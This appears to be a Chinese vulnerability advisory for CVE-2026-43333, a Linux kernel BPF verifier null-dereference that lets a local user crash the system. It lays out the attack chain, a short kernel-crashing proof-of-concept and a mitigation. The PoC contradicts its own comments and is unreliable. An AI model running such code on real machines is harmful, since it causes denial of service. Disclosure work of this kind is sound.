CVE-2026-43333 CVSS 5.5 中危

CVE-2026-43333 Linux Kernel BPF空指针解引用漏洞

披露日期: 2026-05-08

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43333

漏洞类型

拒绝服务

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核BPF子系统存在空指针解引用漏洞。check_mem_access()函数在匹配PTR_TO_BUF类型时，使用base_type()剥离了PTR_MAYBE_NULL标志，导致绕过空指针检查。当Map迭代器处于stop回调状态时，ctx->key和ctx->value为NULL，直接访问会导致内核崩溃，引发拒绝服务。

技术细节

该漏洞位于Linux内核的BPF（Berkeley Packet Filter）验证器中。验证器通过check_mem_access()函数检查内存访问权限，但该函数使用base_type()宏来匹配PTR_TO_BUF类型的指针。由于base_type()会忽略PTR_MAYBE_NULL标志，验证器错误地认为这些指针总是有效，从而允许在没有空值检查的情况下直接解引用。

具体利用场景涉及Map迭代器。在BPF Map迭代过程中，ctx->key和ctx->value指针被标记为PTR_TO_BUF | PTR_MAYBE_NULL。在迭代结束后的stop回调函数中，内核会将这些指针置为NULL。如果攻击者构造的BPF程序在此时直接读取或写入这些指针，就会触发内核空指针解引用异常。由于CVSS评分为5.5，攻击者需要本地低权限即可触发该漏洞，导致系统不可用。

攻击链分析

STEP 1

步骤1

攻击者获得本地低权限用户访问权限（PR:L）。

STEP 2

步骤2

攻击者编写恶意的BPF程序，其中包含Map迭代器逻辑，并在stop回调中直接访问ctx->key指针。

STEP 3

步骤3

攻击者加载并执行该BPF程序。由于验证器漏洞，程序通过了安全检查。

STEP 4

步骤4

当Map迭代结束，触发stop回调，此时ctx->key为NULL，程序尝试解引用该指针。

STEP 5

步骤5

触发内核NULL解引用错误，导致系统崩溃（Kernel Panic），实现拒绝服务攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// Conceptual BPF PoC for CVE-2026-43333
// Triggers NULL dereference in map iterator stop callback

#include <linux/bpf.h>
#include <bpf/bpf_helpers.h>

SEC("iter/map")
int dump_map(struct bpf_iter__map *ctx)
{
    // Vulnerability: In the 'stop' callback (when ctx->meta->seq_num == 0 or end),
    // ctx->key is NULL. The verifier allows this access because it strips
    // PTR_MAYBE_NULL via base_type().
    
    // Direct access without null check causes Kernel Panic
    if (ctx->key) {
        // Valid access during iteration
    } else {
        // Malicious access attempt when key is actually NULL
        // This line should crash the kernel if the bug is present
        __u32 val = *(__u32 *)ctx->key; 
    }
    return 0;
}

char _license[] SEC("license") = "GPL";

影响范围

Linux Kernel (Fix available in stable commits 10bc4a4dcded, 21a10c06ffae, etc.)

防御指南

临时缓解措施

如果无法立即升级内核，建议通过sysctl将kernel.unprivileged_bpf_disabled设置为1，以禁止非特权用户加载BPF程序，从而阻断利用路径。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表